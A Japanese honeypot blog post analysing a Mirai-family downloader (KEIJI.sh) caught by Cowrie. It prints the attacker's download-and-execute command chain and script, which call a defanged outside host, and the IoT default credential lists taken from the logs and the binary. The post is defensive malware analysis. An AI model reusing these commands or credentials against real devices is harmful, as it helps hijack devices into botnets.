ハニーポットの観測記録

ハニーポッターすぎたむちのぶろぐ

ハニーポット観察日記【7】

Cowrie運用15日目ですが、今回はちょっと違う視点から。

sugitamuchi.hatenablog.com

時間があったので、昨日の簡易報告にもありました
ダウンロードされたファイルのKEIJI.shについてログを調査してみました。
※本日も攻撃を観測したため。

対象ファイル名:KEIJI.sh
SHA-256:ba348c878b904f80f01ed087d931da0f8c17983cdcd41be5c52cc348bc1ea36d
※本日、ダウンロードを確認したファイルです。

念のため、VirusTotalで検索してみると以下のことがわかりました。
Mirai/Downloader、検出率: 21 / 59

そこで関連するログを以下のようにトレースしてみましたので、
触りだけ書いていこうと思います。
※以下に記載するIPアドレスやURLなどには、絶対に接続しないでください。

■接続元IPアドレス
下記のIPアドレスから複数の攻撃(Telnet)を観測
・159[.]65[.]232[.]56

■ログイン情報
※対象期間:2018/08/26

試行回数 username / password
20 root / annie2012
18 root / 7ujMko0vizxv
16 root / Zte521
14 default / tlJwpbo6
13 root / uClinux
13 root / klv123
12 default / S2fGqNFs
11 root / fidel123
11 root / 7ujMko0admin
11 admin / epicrouter
11 admin / ZmqVfoSIP
10 root / zlxx
10 root / hi3518
10 admin / motorola
9 root / jvbzd
8 root / ivdev

※これ以外にも複数ありましたが、割愛いたします。

ログイン情報からわかったことは、
HiSilicon社製のIP Cameraなど、複数種のIP Cameraが標的となっていることでした。

■実行コマンド
上述したログイン情報でログインが成功した後に、実行されるコマンドです。

enable
system
shell
sh
/tmp/.ptmx && cd /tmp/
/var/.ptmx && cd /var/
/dev/.ptmx && cd /dev/
/mnt/.ptmx && cd /mnt/
/var/run/.ptmx && cd /var/run/
/var/tmp/.ptmx && cd /var/tmp/
/.ptmx && cd /
/dev/netslink/.ptmx && cd /dev/netslink/
/dev/shm/.ptmx && cd /dev/shm/
/bin/.ptmx && cd /bin/
/etc/.ptmx && cd /etc/
/boot/.ptmx && cd /boot/
/usr/.ptmx && cd /usr/
/bin/busybox rm -rf dbeef oxdedfgt
/bin/busybox cp /bin/busybox dbeef; >dbeef; /bin/busybox chmod 777 dbeef; /bin/busybox lizrd
sh
shell
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI.sh; curl -O http://81[.]4[.]103[.]216/KEIJI.sh; chmod 777 KEIJI.sh; sh KEIJI.sh; tftp 81[.]4[.]103[.]216 -c get tKEIJI.sh; chmod 777 tKEIJI.sh; sh tKEIJI.sh; tftp -r tKEIJI2.sh -g 81[.]4[.]103[.]216; chmod 777 tKEIJI2.sh; sh tKEIJI2.sh; ftpget -v -u anonymous -p anonymous -P 21 81[.]4[.]103[.]216 KEIJI1.sh KEIJI1.sh; sh KEIJI1.sh; rm -rf KEIJI.sh tKEIJI.sh tKEIJI2.sh KEIJI1.sh; rm -rf *;history -c

うちの環境にはtftpコマンドやftpgetコマンドはないので
wget http://81[.]4[.]103[.]216/KEIJI.sh部分のファイルが
ダウンロードされていたものと思われます。

よって、ダウンロードされたKEIJI.shを調査しました。

■KEIJI.shの記述
冒頭でも書きましたが、Mirai/Downloaderとして検出されているファイルです。

[KEIJI.sh]

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI1; curl -O http://81[.]4[.]103[.]216/KEIJI1; chmod +x KEIJI1; ./KEIJI1; rm -rf KEIJI1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI2; curl -O http://81[.]4[.]103[.]216/KEIJI2; chmod +x KEIJI2; ./KEIJI2; rm -rf KEIJI2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI3; curl -O http://81[.]4[.]103[.]216/KEIJI3; chmod +x KEIJI3; ./KEIJI3; rm -rf KEIJI3
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI4; curl -O http://81[.]4[.]103[.]216/KEIJI4; chmod +x KEIJI4; ./KEIJI4; rm -rf KEIJI4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI5; curl -O http://81[.]4[.]103[.]216/KEIJI5; chmod +x KEIJI5; ./KEIJI5; rm -rf KEIJI5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI6; curl -O http://81[.]4[.]103[.]216/KEIJI6; chmod +x KEIJI6; ./KEIJI6; rm -rf KEIJI6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI7; curl -O http://81[.]4[.]103[.]216/KEIJI7; chmod +x KEIJI7; ./KEIJI7; rm -rf KEIJI7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI8; curl -O http://81[.]4[.]103[.]216/KEIJI8; chmod +x KEIJI8; ./KEIJI8; rm -rf KEIJI8
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI9; curl -O http://81[.]4[.]103[.]216/KEIJI9; chmod +x KEIJI9; ./KEIJI9; rm -rf KEIJI9
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI10; curl -O http://81[.]4[.]103[.]216/KEIJI10; chmod +x KEIJI10; ./KEIJI10; rm -rf KEIJI10
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI11; curl -O http://81[.]4[.]103[.]216/KEIJI11; chmod +x KEIJI11; ./KEIJI11; rm -rf KEIJI11
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI12; curl -O http://81[.]4[.]103[.]216/KEIJI12; chmod +x KEIJI12; ./KEIJI12; rm -rf KEIJI12
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://81[.]4[.]103[.]216/KEIJI13; curl -O http://81[.]4[.]103[.]216/KEIJI13; chmod +x KEIJI13; ./KEIJI13; rm -rf KEIJI13

仲間のKEIJIを呼び、実行後、削除という流れでしょうか。
実はここ数日、このKEIJIさんをモニタリングしていましたが、
呼ばれる仲間の人数が徐々に増えていますw

試しにKEIJI1さんを呼んで、逆聴取してみました。

■KEIJI1の記述
KEIJI1さんは以下のような調子でしたので、解析に時間がかかりそう。

KEIJI1: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped

ということでstringsコマンドなどで、さらっと逆聴取してみたところ、
攻撃の際に利用するログイン情報のリストを吐いてくれました。(KEIJI1「グハァッ…」)
※ユーザ名とパスワードだと推測されます。

root
admin
ubnt
default
default
admin
daemon
S2fGqNFs
guest
password
adminadmin
OxhlwSG8
true
pass
asante
LSiuY7pOmZG2s
Uq-4GIt3M
GM8182
cms500
anko
3ep5w2u
Serv4EMC0
ROOT500
tlJwpbo6
ahetzip8
inflection
kont2004
t0talc0ntr0l4!
user
awind5885

これらの情報をもとにggってみたところ、
以下のような複数の製品が標的となっていることがわかりました。
・Claro社製 Router
・Thomson社製 Modem
・CoolCam社製 IP Camera
・Control4社製 Home Control


まぁ、Mirai(もしくは亜種)ですね。(最初から知ってた。。)
よい子のみんなは、初期パスワードは変更しましょうね。

以上です。


参考

www.malagana.net

www.exploit-db.com

www.pentestpartners.com

pwn2ownnow Blog